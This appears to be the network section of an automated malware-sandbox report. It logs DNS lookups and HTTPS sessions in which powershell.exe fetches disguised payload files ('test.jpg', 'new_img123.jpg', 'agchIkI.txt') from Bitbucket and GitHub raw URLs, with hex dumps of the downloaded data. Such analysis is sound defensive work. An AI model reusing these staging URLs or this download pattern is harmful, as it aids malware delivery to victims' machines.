                                                                                                      Dec 16, 2024 15:36:24.557192087 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:28.270607948 CET49728443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:28.270648003 CET44349728185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:28.270742893 CET49728443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:28.271050930 CET49728443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:28.271065950 CET44349728185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:29.849508047 CET44349728185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:29.881131887 CET49728443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:29.881155968 CET44349728185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:30.585879087 CET44349728185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:30.585901976 CET44349728185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:30.585964918 CET44349728185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:30.586054087 CET49728443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:30.586055040 CET49728443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:30.587622881 CET49728443192.168.2.7185.166.143.50

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 16, 2024 15:36:12.922513008 CET6322053192.168.2.71.1.1.1
                                                                                                      Dec 16, 2024 15:36:13.060796022 CET53632201.1.1.1192.168.2.7
                                                                                                      Dec 16, 2024 15:36:15.274190903 CET6265353192.168.2.71.1.1.1
                                                                                                      Dec 16, 2024 15:36:15.411499023 CET53626531.1.1.1192.168.2.7
                                                                                                      Dec 16, 2024 15:36:30.591608047 CET6021853192.168.2.71.1.1.1
                                                                                                      Dec 16, 2024 15:36:30.979909897 CET53602181.1.1.1192.168.2.7
                                                                                                      Dec 16, 2024 15:36:43.173654079 CET4930253192.168.2.71.1.1.1
                                                                                                      Dec 16, 2024 15:36:43.413877964 CET53493021.1.1.1192.168.2.7

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Dec 16, 2024 15:36:12.922513008 CET192.168.2.71.1.1.10x87ffStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:15.274190903 CET192.168.2.71.1.1.10xdca8Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:30.591608047 CET192.168.2.71.1.1.10xf015Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:43.173654079 CET192.168.2.71.1.1.10xd39dStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Dec 16, 2024 15:36:13.060796022 CET1.1.1.1192.168.2.70x87ffNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:13.060796022 CET1.1.1.1192.168.2.70x87ffNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:13.060796022 CET1.1.1.1192.168.2.70x87ffNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:15.411499023 CET1.1.1.1192.168.2.70xdca8No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:15.411499023 CET1.1.1.1192.168.2.70xdca8No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:15.411499023 CET1.1.1.1192.168.2.70xdca8No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:15.411499023 CET1.1.1.1192.168.2.70xdca8No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:30.979909897 CET1.1.1.1192.168.2.70xf015No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:30.979909897 CET1.1.1.1192.168.2.70xf015No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:30.979909897 CET1.1.1.1192.168.2.70xf015No error (0)s3-w.us-east-1.amazonaws.com16.182.39.201A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:30.979909897 CET1.1.1.1192.168.2.70xf015No error (0)s3-w.us-east-1.amazonaws.com3.5.25.38A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:30.979909897 CET1.1.1.1192.168.2.70xf015No error (0)s3-w.us-east-1.amazonaws.com52.217.66.156A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:30.979909897 CET1.1.1.1192.168.2.70xf015No error (0)s3-w.us-east-1.amazonaws.com16.182.74.41A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:30.979909897 CET1.1.1.1192.168.2.70xf015No error (0)s3-w.us-east-1.amazonaws.com54.231.159.57A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:30.979909897 CET1.1.1.1192.168.2.70xf015No error (0)s3-w.us-east-1.amazonaws.com16.182.107.153A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:30.979909897 CET1.1.1.1192.168.2.70xf015No error (0)s3-w.us-east-1.amazonaws.com52.217.119.73A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:30.979909897 CET1.1.1.1192.168.2.70xf015No error (0)s3-w.us-east-1.amazonaws.com3.5.25.56A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:43.413877964 CET1.1.1.1192.168.2.70xd39dNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:43.413877964 CET1.1.1.1192.168.2.70xd39dNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:43.413877964 CET1.1.1.1192.168.2.70xd39dNo error (0)s3-w.us-east-1.amazonaws.com54.231.161.1A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:43.413877964 CET1.1.1.1192.168.2.70xd39dNo error (0)s3-w.us-east-1.amazonaws.com52.216.109.43A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:43.413877964 CET1.1.1.1192.168.2.70xd39dNo error (0)s3-w.us-east-1.amazonaws.com16.182.70.97A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:43.413877964 CET1.1.1.1192.168.2.70xd39dNo error (0)s3-w.us-east-1.amazonaws.com52.217.70.36A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:43.413877964 CET1.1.1.1192.168.2.70xd39dNo error (0)s3-w.us-east-1.amazonaws.com52.216.146.155A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:43.413877964 CET1.1.1.1192.168.2.70xd39dNo error (0)s3-w.us-east-1.amazonaws.com3.5.12.236A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:43.413877964 CET1.1.1.1192.168.2.70xd39dNo error (0)s3-w.us-east-1.amazonaws.com3.5.21.64A (IP address)IN (0x0001)false
                                                                                                      Dec 16, 2024 15:36:43.413877964 CET1.1.1.1192.168.2.70xd39dNo error (0)s3-w.us-east-1.amazonaws.com3.5.17.61A (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • bitbucket.org
                                                                                                      • raw.githubusercontent.com

                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.749700185.166.143.504437548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-16 14:36:14 UTC113OUTGET /jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611 HTTP/1.1
                                                                                                      Host: bitbucket.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-12-16 14:36:15 UTC5912INHTTP/1.1 302 Found
                                                                                                      Date: Mon, 16 Dec 2024 14:36:14 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Content-Length: 0
                                                                                                      Server: AtlassianEdge
                                                                                                      Location: https://bbuseruploads.s3.amazonaws.com/2dd18843-1672-4067-bc92-40ec1cff5f15/downloads/cd888b79-d693-4ddd-b0f4-cccbfdae68aa/test.jpg?response-content-disposition=attachment%3B%20filename%3D%22test.jpg%22&AWSAccessKeyId=ASIA6KOSE3BND2LSHFUO&Signature=0vs6WpEuxPI8Y0VWXgHh3hrVZrY%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGcaCXVzLWVhc3QtMSJHMEUCIAGhiUETDHij7pVRR66vkrrTXDZC7m5WerB6QQo9wZ%2BaAiEApQYClqL7EW7fZGFOH0qHUizUC6rtt6nkJW8MHZ3S5EYqpwIIMBAAGgw5ODQ1MjUxMDExNDYiDKprY1pTlmyeO%2FcHZyqEAjwUnfqza%2FUgzLtniW3oUrjnmHQCn7YeQ3HKwiYHs1igLQ4G5aRSemc0ZDaU9owsTehmpt1dMKbgJe7sefZwJQwWEAeyz%2FI2bajYXRwrJA7L9fcdUB8VHEmRp1Om7s0lUU8%2BjLwA3REV4%2Bfvm3Mgun2X6EcR4hOSSPC1trIz64qqxcjVpcLlajoqzEO1oZc4qxfWAHz8BmBOirJtrPAfw7oENgJWeMsYdUQ%2BzYPLMa11S3LwWUbHOlNRx0Y6akngvhrmEwHXyKzvpBAE%2FqU%2BQg98T%2FY%2FgBN5pZ4hqHXvcuWoV2XVVgQTXREjjTpqFhEpm1ySYj5tpQrk72KeLgycKEst15eqMJjxgLsGOp0BCf4rtR8ggu3JowBsID37Z1bMdjp0qEYOX%2FsFFEjBNZB7fbhar74EhqZDshs0VVfM420WYwRl8fr85DIvK3zStP%2FmX%2FzBS4p5NgIxY4FeXo1D5yvpTrs4sTc5oPvdE4FIzxnDkQ01Kbb0vno%2 [TRUNCATED]
                                                                                                      Expires: Mon, 16 Dec 2024 14:36:14 GMT
                                                                                                      Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                      X-Used-Mesh: False
                                                                                                      Vary: Accept-Language, Origin
                                                                                                      Content-Language: en
                                                                                                      X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                      X-Dc-Location: Micros-3
                                                                                                      X-Served-By: 2d23560027d2
                                                                                                      X-Version: 448c766573cd
                                                                                                      X-Static-Version: 448c766573cd
                                                                                                      X-Request-Count: 1694
                                                                                                      X-Render-Time: 0.042084693908691406
                                                                                                      X-B3-Traceid: 562fd8c95cc040d0a59a61dc00874127
                                                                                                      X-B3-Spanid: 717c1c0d2db4617e
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend [TRUNCATED]
                                                                                                      X-Usage-Quota-Remaining: 999192.741
                                                                                                      X-Usage-Request-Cost: 820.03
                                                                                                      X-Usage-User-Time: 0.021510
                                                                                                      X-Usage-System-Time: 0.003091
                                                                                                      X-Usage-Input-Ops: 0
                                                                                                      X-Usage-Output-Ops: 0
                                                                                                      Age: 0
                                                                                                      X-Cache: MISS
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Xss-Protection: 1; mode=block
                                                                                                      Atl-Traceid: 562fd8c95cc040d0a59a61dc00874127
                                                                                                      Atl-Request-Id: 562fd8c9-5cc0-40d0-a59a-61dc00874127
                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                      Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                      Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                      Server-Timing: atl-edge;dur=155,atl-edge-internal;dur=4,atl-edge-upstream;dur=152,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.749701185.199.109.1334437548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-16 14:36:16 UTC121OUTGET /gmedusa135/nano/refs/heads/main/new_img123.jpg HTTP/1.1
                                                                                                      Host: raw.githubusercontent.com
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-12-16 14:36:17 UTC889INHTTP/1.1 200 OK
                                                                                                      Connection: close
                                                                                                      Content-Length: 4697658
                                                                                                      Cache-Control: max-age=300
                                                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                      Content-Type: image/jpeg
                                                                                                      ETag: "b899cc7aa3319a16e239ba6cb263113b100d6fa7ed0190f683f329a66758220c"
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: deny
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      X-GitHub-Request-Id: 16FD:36817C:12AD50D:14B88E6:67603915
                                                                                                      Accept-Ranges: bytes
                                                                                                      Date: Mon, 16 Dec 2024 14:36:16 GMT
                                                                                                      Via: 1.1 varnish
                                                                                                      X-Served-By: cache-ewr-kewr1740065-EWR
                                                                                                      X-Cache: HIT
                                                                                                      X-Cache-Hits: 0
                                                                                                      X-Timer: S1734359777.925673,VS0,VE68
                                                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                      X-Fastly-Request-ID: a42c178ab85d9affd5859f2c929638d802fdac02
                                                                                                      Expires: Mon, 16 Dec 2024 14:41:16 GMT
                                                                                                      Source-Age: 0
                                                                                                      2024-12-16 14:36:17 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 01 00 48 00 48 00 00 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64
                                                                                                      Data Ascii: JFIFHHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@d
                                                                                                      2024-12-16 14:36:17 UTC1378INData Raw: 03 66 03 72 03 7e 03 8a 03 96 03 a2 03 ae 03 ba 03 c7 03 d3 03 e0 03 ec 03 f9 04 06 04 13 04 20 04 2d 04 3b 04 48 04 55 04 63 04 71 04 7e 04 8c 04 9a 04 a8 04 b6 04 c4 04 d3 04 e1 04 f0 04 fe 05 0d 05 1c 05 2b 05 3a 05 49 05 58 05 67 05 77 05 86 05 96 05 a6 05 b5 05 c5 05 d5 05 e5 05 f6 06 06 06 16 06 27 06 37 06 48 06 59 06 6a 06 7b 06 8c 06 9d 06 af 06 c0 06 d1 06 e3 06 f5 07 07 07 19 07 2b 07 3d 07 4f 07 61 07 74 07 86 07 99 07 ac 07 bf 07 d2 07 e5 07 f8 08 0b 08 1f 08 32 08 46 08 5a 08 6e 08 82 08 96 08 aa 08 be 08 d2 08 e7 08 fb 09 10 09 25 09 3a 09 4f 09 64 09 79 09 8f 09 a4 09 ba 09 cf 09 e5 09 fb 0a 11 0a 27 0a 3d 0a 54 0a 6a 0a 81 0a 98 0a ae 0a c5 0a dc 0a f3 0b 0b 0b 22 0b 39 0b 51 0b 69 0b 80 0b 98 0b b0 0b c8 0b e1 0b f9 0c 12 0c 2a 0c 43 0c
                                                                                                      Data Ascii: fr~ -;HUcq~+:IXgw'7HYj{+=Oat2FZn%:Ody'=Tj"9Qi*C
                                                                                                      2024-12-16 14:36:17 UTC1378INData Raw: 97 75 97 e0 98 4c 98 b8 99 24 99 90 99 fc 9a 68 9a d5 9b 42 9b af 9c 1c 9c 89 9c f7 9d 64 9d d2 9e 40 9e ae 9f 1d 9f 8b 9f fa a0 69 a0 d8 a1 47 a1 b6 a2 26 a2 96 a3 06 a3 76 a3 e6 a4 56 a4 c7 a5 38 a5 a9 a6 1a a6 8b a6 fd a7 6e a7 e0 a8 52 a8 c4 a9 37 a9 a9 aa 1c aa 8f ab 02 ab 75 ab e9 ac 5c ac d0 ad 44 ad b8 ae 2d ae a1 af 16 af 8b b0 00 b0 75 b0 ea b1 60 b1 d6 b2 4b b2 c2 b3 38 b3 ae b4 25 b4 9c b5 13 b5 8a b6 01 b6 79 b6 f0 b7 68 b7 e0 b8 59 b8 d1 b9 4a b9 c2 ba 3b ba b5 bb 2e bb a7 bc 21 bc 9b bd 15 bd 8f be 0a be 84 be ff bf 7a bf f5 c0 70 c0 ec c1 67 c1 e3 c2 5f c2 db c3 58 c3 d4 c4 51 c4 ce c5 4b c5 c8 c6 46 c6 c3 c7 41 c7 bf c8 3d c8 bc c9 3a c9 b9 ca 38 ca b7 cb 36 cb b6 cc 35 cc b5 cd 35 cd b5 ce 36 ce b6 cf 37 cf b8 d0 39 d0 ba d1 3c d1 be d2
                                                                                                      Data Ascii: uL$hBd@iG&vV8nR7u\D-u`K8%yhYJ;.!zpg_XQKFA=:8655679<
                                                                                                      2024-12-16 14:36:17 UTC1378INData Raw: 26 98 26 02 60 98 86 98 00 20 c0 00 00 29 30 00 10 60 00 09 80 00 00 00 00 31 00 28 00 69 80 00 00 00 03 12 30 43 00 00 00 01 30 1a 74 9a 06 00 00 80 30 4d 0c 10 c0 01 31 03 04 03 00 1a 00 01 30 01 30 62 41 a6 02 60 00 00 00 03 0b 00 00 00 1a 06 81 a1 89 8d 06 98 a4 9d 89 a0 18 20 00 00 00 2a 24 80 1d 80 00 31 00 62 06 00 58 00 0c 01 92 44 c1 18 08 00 83 00 18 00 58 0c 14 a2 c6 26 83 4c 72 84 ae 66 f9 8c cb 99 16 d0 29 a6 21 40 62 68 40 69 5a 10 c4 0d 00 d0 0d 00 00 a0 00 84 4a 2c 00 06 80 18 86 c4 8d 30 01 88 18 d1 2b 13 4d 00 04 30 1a 28 68 91 b4 e9 30 13 04 10 28 0c 00 40 01 a0 06 21 30 04 35 01 23 4c 54 c0 13 10 06 0a 40 80 01 96 26 10 03 12 60 01 40 98 0d 43 19 62 24 90 4c 54 48 44 30 1c 41 89 80 80 1a 1a 10 00 a0 80 4d 4a 0d 00 0a d3 95 88 24 8a 49
                                                                                                      Data Ascii: &&` )0`1(i0C0t0M100bA` *$1bXDX&Lrf)!@bh@iZJ,0+M0(h0(@!05#LT@&`@Cb$LTHD0AMJ$I
                                                                                                      2024-12-16 14:36:17 UTC1378INData Raw: 00 00 00 00 00 00 00 00 28 06 20 00 00 06 20 62 06 00 02 60 00 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 c1 30 13 43 43 10 30 00 00 00 28 13 80 0b 00 14 01 00 62 00 00 00 00 00 1a 00 06 86 26 98 00 00 00 08 00 03 04 d3 00 00 00 01 06 81 a1 80 00 26 0d 00 30 13 00 0b 1a 18 21 c0 05 00 00 08 34 00 0a 34 20 0c 40 00 00 d0 0c 00 01 30 13 00 00 00 00 10 06 02 60 08 60 02 60 01 40 d2 00 0c 00 00 06 81 a0 1a 62 6d 58 00 09 80 00 00 00 00 c0 69 a0 00 03 a4 0c 10 c0 04 06 84 c0 00 50 00 06 82 68 68 00 00 06 20 06 08 18 00 31 00 89 82 80 00 00 d3 44 30 43 00 68 01 88 00 69 a0 05 02 60 00 03 13 4c 00 46 98 00 86 26 26 3a 06 90 06 26 21 80 8d 00 34 c1 0e 86 9a 26 00 d0 8c 0a 1b 10 4d 43 40 36 8a 6c 11 8d 22 60 0c 2c 4d 82 18 80 30 42 1b 4c 1a 10 69 89 a0 24 81 34
                                                                                                      Data Ascii: ( b`0CC0(b&&0!44 @0```@bmXiPhh 1D0Chi`LF&&:&!4&MC@6l"`,M0BLi$4
                                                                                                      2024-12-16 14:36:17 UTC1378INData Raw: 00 40 0c 00 10 01 58 cb 3c e0 1f 3f ec 80 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 00 00 00 34 00 c4 c0 4c 04 30 4c 04 c4 34 c0 13 00 04 d0 30 00 10 34 d1 34 d4 43 00 40 c4 31 30 13 01 03 04 8c 05 4c 48 c4 d5 0c 44 c4 34 c1 34 d5 34 d1 00 0d 00 c0 04 c0 04 00 a0 00 00 4c 20 02 80 00 00 00 00 00 00 00 00 00 00 00 00 02 80 00 00 1a 00 00 00 1a 01 80 20 60 09 80 00 00 00 14 00 00 00 00 d0 00 00 00 00 0d 0c 10 0c 13 01 0c 00 00 00 02 80 10 01 40 24 00 b4 01 00 00 00 00 00 00 00 68 60 81 a0 18 00 02 06 00 00 9a 26 0a 00 83 4c 00 00 00 1a 20 60 98 02 60 0c 43 43 01 00 28 00 18 00 00 34 80 00 00 0c 10 d0 c0 00 00 00 00 00 1a 04 01 aa 00 00 46 80 1a 06 05 00 00 00 00 00 00 20 00 34 03 10 0d 03 10 c0 00 06 80 1a 2c 60 03 40 c4 c0 01 0d 0c
                                                                                                      Data Ascii: @X<?P4L0L4044C@10LHD444L `@$h`&L ``CC(4F 4,`@
                                                                                                      2024-12-16 14:36:17 UTC1378INData Raw: 63 1a 04 20 01 44 12 80 00 98 98 a8 4d cb 11 82 63 10 00 31 00 95 45 8d 22 c6 26 98 34 20 0c 40 c4 34 30 44 a2 48 8b 00 02 93 68 00 81 85 83 1a 31 bb 12 6d 10 31 34 0d 00 02 00 8c b2 71 74 20 86 05 0d 03 40 0d 21 8a 42 69 89 a0 01 00 12 82 74 49 12 34 2a 6a 24 b2 44 55 91 52 b4 0a a5 12 1b 4e 9c 5a 1a 68 60 d1 c4 01 02 80 0d 00 21 ca 98 d1 01 42 93 22 c0 8b 60 0d 20 d3 10 c0 04 31 4a 93 4d 04 31 49 c5 24 9a 00 62 68 3c d8 1e 0f b6 00 00 00 00 00 00 00 00 00 00 34 00 00 d3 00 43 13 10 c1 00 03 04 c0 4d 00 d0 31 03 04 00 20 c1 44 c4 13 04 31 41 31 30 41 00 34 00 00 30 00 54 d3 40 40 d3 01 00 34 03 40 34 00 d0 0d 2b 10 31 08 03 00 40 c2 93 08 13 54 c1 48 c0 a0 00 04 30 00 00 00 00 00 00 00 00 00 a0 08 00 00 28 02 00 28 00 06 80 00 18 00 00 00 00 00 00 00 00
                                                                                                      Data Ascii: c DMc1E"&4 @40DHh1m14qt @!BitI4*j$DURNZh`!B"` 1JM1I$bh<4CM1 D1A10A40T@@4@4+1@TH0((
                                                                                                      2024-12-16 14:36:17 UTC1378INData Raw: 06 21 a1 80 02 60 00 00 80 31 0d 03 40 34 e8 05 03 0a 1a 62 60 00 20 d3 00 00 00 00 01 89 a1 01 a0 00 18 08 00 04 b2 40 80 03 00 00 13 4c 4c 04 c0 00 01 80 02 00 50 00 34 c0 00 00 01 a0 20 68 00 00 63 a0 12 34 25 01 4a c4 c1 a1 18 14 34 03 4d 00 06 80 18 50 c6 82 92 42 71 9d 83 06 40 10 60 00 20 09 5a 18 d0 ec 10 43 40 a8 18 01 43 04 6d 34 60 d0 4d 53 43 44 04 a0 2a 18 e0 02 c4 31 50 d0 20 18 30 8c a2 38 31 50 0a 01 03 15 0a 40 98 d1 30 01 00 d3 00 2c 00 86 05 00 00 00 9b 22 d8 26 08 30 06 3b 22 d8 24 d0 c1 91 63 1b 43 23 10 0c 10 25 68 04 34 03 62 60 80 00 86 a9 49 00 d0 d0 02 68 9a 12 34 45 64 44 57 14 e5 04 02 44 ad 26 a0 98 80 50 71 1b 44 00 00 00 26 00 0d a5 63 04 49 00 0c 12 6c 43 01 82 03 2c 00 00 60 98 21 82 60 03 48 00 00 c4 30 52 8b 06 8b 00 90
                                                                                                      Data Ascii: !`1@4b` @LLP4 hc4%J4MPBq@` ZC@Cm4`MSCD*1P 081P@0,"&0;"$cC#%h4b`Ih4EdDWD&PqD&cIlC,`!`H0R
                                                                                                      2024-12-16 14:36:17 UTC1378INData Raw: 00 02 80 00 00 01 00 00 00 00 00 00 00 18 80 06 98 81 88 18 26 08 60 00 80 00 00 00 00 c1 30 43 40 c0 00 13 00 4c 00 01 a1 00 00 00 18 21 82 60 21 b1 00 00 c4 c2 c0 08 00 a0 08 01 d2 18 02 63 40 80 0a 00 8c 4c 00 00 00 00 62 b0 19 08 65 09 80 00 00 80 00 34 00 03 10 d0 c4 30 00 00 62 00 4c 62 00 00 00 28 02 00 74 80 80 1d 21 82 1a 18 08 00 00 c1 34 0c 00 00 00 00 00 00 04 06 94 69 a0 00 34 e9 29 02 00 00 1a 60 86 09 82 00 00 d0 c0 06 9a 26 00 0d 10 0a 0c 44 02 80 00 00 00 03 10 cb 00 00 00 00 13 04 c6 20 06 98 09 80 02 00 c0 45 34 c1 34 e1 0d 00 03 40 09 8a 00 80 25 1a 62 69 80 08 00 a0 34 4c 28 04 36 08 03 10 c1 89 d8 00 12 52 65 89 d8 d8 90 62 06 00 d2 19 24 89 80 98 00 d0 c1 23 02 86 98 c4 d0 62 b2 40 20 08 1a 70 99 2a 43 11 0d 82 45 34 e3 0e 2d 28 02
                                                                                                      Data Ascii: &`0C@L!`!c@Lbe40bLb(t!4i4)`&D E44@%bi4L(6Reb$#b@ p*CE4-(
                                                                                                      2024-12-16 14:36:17 UTC1378INData Raw: 49 02 03 04 11 52 4a 40 c7 72 81 00 0a a4 08 93 6a 80 01 a4 60 c4 00 26 1e 54 67 ce fb e0 08 81 89 a6 26 98 26 02 01 a6 08 60 86 86 98 00 81 a6 00 ac 60 00 00 00 00 00 00 00 00 09 80 00 00 00 00 00 00 00 00 00 00 14 01 00 00 00 00 00 00 14 00 00 00 00 34 00 c4 d3 13 40 30 04 d0 d0 c4 c4 0c 00 4c 4d 03 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 01 82 1a 06 80 68 18 14 98 40 05 00 20 00 00 00 00 00 00 c0 13 10 c0 00 00 04 13 15 30 00 11 30 00 00 00 00 01 82 60 02 06 00 d3 44 0c 00 00 00 00 00 00 01 80 05 80 00 00 26 00 00 99 00 14 0d 00 c0 00 00 13 04 68 06 98 02 60 00 00 80 0a d3 2c 43 00 18 80 46 26 26 00 00 86 81 80 81 82 68 60 09 80 d0 50 04 0d 03 05 60 0c 4d 30 00 00 01 a0 00 01 91 18 00 00 00 00 0d 0d 0c 43 04 c0 00 13 00 19 60 86 21
                                                                                                      Data Ascii: IRJ@rj`&Tg&&``4@0LMh@ 00`D&h`,CF&&h`P`M0C`!


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.749728185.166.143.504437548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-16 14:36:29 UTC100OUTGET /eqweqwt/wqeqwfs/downloads/agchIkI.txt HTTP/1.1
                                                                                                      Host: bitbucket.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-12-16 14:36:30 UTC5941INHTTP/1.1 302 Found
                                                                                                      Date: Mon, 16 Dec 2024 14:36:30 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Content-Length: 0
                                                                                                      Server: AtlassianEdge
